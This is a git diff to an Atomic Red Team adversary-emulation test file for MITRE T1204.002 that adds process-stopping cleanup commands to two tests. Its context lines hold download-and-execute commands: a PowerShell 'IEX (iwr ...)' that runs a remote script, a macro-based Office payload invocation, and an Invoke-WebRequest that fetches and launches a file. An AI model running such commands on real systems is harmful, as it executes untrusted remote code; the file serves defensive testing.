diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 934d8f7e..de27b9aa 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -293,6 +293,8 @@ atomic_tests:
         IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
         Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
     name: powershell
+    cleanup_command: |
+      Stop-Process -name mshta
 - name: Potentially Unwanted Applications (PUA)
   auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
   description: |
@@ -315,6 +317,7 @@ atomic_tests:
       Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
       & "#{pua_file}"
     cleanup_command: |
+      Stop-Process -name PotentiallyUnwanted
       Remove-Item #{pua_file} -ErrorAction Ignore
 - name: Office Generic Payload Download
   auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c